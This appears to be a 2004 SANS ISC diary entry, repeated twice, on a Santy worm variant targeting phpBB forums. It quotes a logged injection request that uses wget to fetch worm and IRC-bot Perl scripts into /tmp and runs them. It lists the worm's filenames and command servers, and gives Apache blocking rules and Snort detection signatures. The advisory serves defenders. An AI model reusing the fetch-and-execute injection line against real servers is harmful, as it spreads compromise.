Santy Variant?; Year End Poll
Santy Variant?
Merry Christmas! Unfortunately, the greetings from Marcus to all our readers has to keep short.
http://isc.sans.org/diary.php?date=2004-12-24
We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm.
It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.
"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"
You can see that the files pull off include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt
worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system.
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667.
From other piece of logs submitted, we have IRC server as:
ssh.gigachat.net
leaf-sunwave.animirc.net
eu.undernet.org
irc.efnet.net
Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include:
adfkgnnodfijg
bot
bot.txt
bot.txt.1
dry.scp
ssh.a
terrorbot.txt
terrorbot.txt.1
terrorworm.txt
terrorworm.txt.1
unbot.txt
unbot.txt.1
unbot.txt.2
unbot.txt.3
unworm.txt
unworm.txt.1
unworm.txt.2
unworm.txt.3
worm1.txt
worm.txt
worm.txt.1
One of our readers has blocked this attack with apache conf directives as such:
SetEnvIf User-Agent "LWP::" get_lost
SetEnvIf User-Agent "lwp-trivial" get_lost
<Directory /usr/local/apache/htdocs/your_phpdirectory>
Order Allow,Deny
Deny from env=get_lost
Allow from all
</Directory>
Another reader has created this apache rule:
<Directory /*>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]
</Directory>
K-Otik has published a copy that uses AOL/Yahoo search instead.
http://www.k-otik.com/exploits/20041225.SantyB.php
Let us know if you have seen the same thing.
Here are some Snort signatures written by Erik:
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|q=inurl|3a2a|
.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype:
trojan-activity; sid:900024; rev:1; )
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|"; nocase;
content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase;
within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity;
sid:900024; rev:2; )
alert tcp $HOME_NET any -> any 80 (msg: Santy.B worm variants
serarching for targets (yahoo)"; content:"GET /search|3f|";
nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|=";
nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=
1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established;
classtype: trojan-activity; sid:900024; rev:3; )
alert tcp $HOME_NET any -> any 6667 (msg:"Suspected Botnet
Activity"; classtype: string-detect; sid:900025; rev:1;
tag:session,50,packets; content: "PRIVMSG"; nocase;
pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|
Total pacotes|Total bytes|Média de envio|portas? aberta)/i"; )
alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "suspected
php injection attack"; content: "GET /"; nocase; content:
".php|3f|"; nocase; within: 64; pcre: "/(name=http|
cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,
established; classtype: trojan-activity; sid:900026; rev:1; )
Bleedsnort has also created some Snort signatures to detect this:
http://www.bleedingsnort.com/
Use them as you deem fit.
Year End Poll
Earlier, we have asked you what is your favorites diary:
http://isc.sans.org/diary.php?date=2004-12-12
Have you send us your vote? If not, send us your choice now. We will close the poll on New Year eve and let you know the result soon after.
Merry Christmas! Unfortunately, the greetings from Marcus to all our readers has to keep short.
http://isc.sans.org/diary.php?date=2004-12-24
We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm.
It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.
"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"
You can see that the files pull off include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt
worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system.
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667.
From other piece of logs submitted, we have IRC server as:
ssh.gigachat.net
leaf-sunwave.animirc.net
eu.undernet.org
irc.efnet.net
Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include:
adfkgnnodfijg
bot
bot.txt
bot.txt.1
dry.scp
ssh.a
terrorbot.txt
terrorbot.txt.1
terrorworm.txt
terrorworm.txt.1
unbot.txt
unbot.txt.1
unbot.txt.2
unbot.txt.3
unworm.txt
unworm.txt.1
unworm.txt.2
unworm.txt.3
worm1.txt
worm.txt
worm.txt.1
One of our readers has blocked this attack with apache conf directives as such:
SetEnvIf User-Agent "LWP::" get_lost
SetEnvIf User-Agent "lwp-trivial" get_lost
<Directory /usr/local/apache/htdocs/your_phpdirectory>
Order Allow,Deny
Deny from env=get_lost
Allow from all
</Directory>
Another reader has created this apache rule:
<Directory /*>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]
</Directory>
K-Otik has published a copy that uses AOL/Yahoo search instead.
http://www.k-otik.com/exploits/20041225.SantyB.php
Let us know if you have seen the same thing.
Here are some Snort signatures written by Erik:
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|q=inurl|3a2a|
.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype:
trojan-activity; sid:900024; rev:1; )
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|"; nocase;
content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase;
within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity;
sid:900024; rev:2; )
alert tcp $HOME_NET any -> any 80 (msg: Santy.B worm variants
serarching for targets (yahoo)"; content:"GET /search|3f|";
nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|=";
nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=
1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established;
classtype: trojan-activity; sid:900024; rev:3; )
alert tcp $HOME_NET any -> any 6667 (msg:"Suspected Botnet
Activity"; classtype: string-detect; sid:900025; rev:1;
tag:session,50,packets; content: "PRIVMSG"; nocase;
pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|
Total pacotes|Total bytes|Média de envio|portas? aberta)/i"; )
alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "suspected
php injection attack"; content: "GET /"; nocase; content:
".php|3f|"; nocase; within: 64; pcre: "/(name=http|
cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,
established; classtype: trojan-activity; sid:900026; rev:1; )
Bleedsnort has also created some Snort signatures to detect this:
http://www.bleedingsnort.com/
Use them as you deem fit.
Year End Poll
Earlier, we have asked you what is your favorites diary:
http://isc.sans.org/diary.php?date=2004-12-12
Have you send us your vote? If not, send us your choice now. We will close the poll on New Year eve and let you know the result soon after.
Keywords:
0 comment(s)
×
Diary Archives
Comments